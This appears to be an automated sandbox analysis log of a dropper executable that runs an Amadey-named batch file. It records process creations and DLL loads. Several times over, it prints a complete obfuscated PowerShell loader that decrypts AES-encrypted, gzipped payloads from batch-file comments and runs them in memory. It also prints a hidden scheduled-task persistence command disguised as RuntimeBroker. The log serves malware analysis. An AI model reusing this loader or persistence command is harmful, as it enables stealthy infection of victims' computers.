Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Command line argument: sfxname	0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Command line argument: sfxstime	0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Command line argument: STARTDLG	0_2_00A3F05C

Source: jcgLYlM4dg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jcgLYlM4dg.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File read: C:\Users\user\Desktop\jcgLYlM4dg.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jcgLYlM4dg.exe "C:\Users\user\Desktop\jcgLYlM4dg.exe"
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
